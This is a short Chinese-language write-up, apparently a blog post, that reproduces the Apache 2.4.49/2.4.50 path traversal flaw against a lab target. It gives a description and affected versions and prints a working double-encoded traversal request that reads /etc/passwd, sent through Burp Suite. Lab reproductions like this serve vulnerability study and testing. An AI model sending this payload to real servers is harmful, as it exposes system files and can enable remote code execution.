影响版本
Apache 2.4.49
Apache 2.4.50
当前描述
发现Apache HTTP Server 2.4.50中对CVE-221-41773的修复不足。攻击者可以使用路径遍历攻击将URL映射到Alias类指令配置的目录之外的文件。如果这些目录之外的文件不受通常默认配置“要求全部拒绝”的保护,这些请求可能会成功。如果还为这些别名路径启用了CGI脚本,这可能允许远程代码执行。此问题仅影响Apache 2.4.49和Apache 2.4.50,而不影响早期版本。
环境搭建可以查看我的上一篇文章
https://developer.aliyun.com/article/1113693?spm=a2c6h.26396819.creator-center.10.43283e1865liIz
靶机ip:192.168.0.11:8080
漏洞复现
我们在kali中对靶场进行抓包
BurpSuite抓到的包
Poc:
GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
把捕获的数据包发送到repeater
然后将坡村复制到数据包中然后发送
复现完成
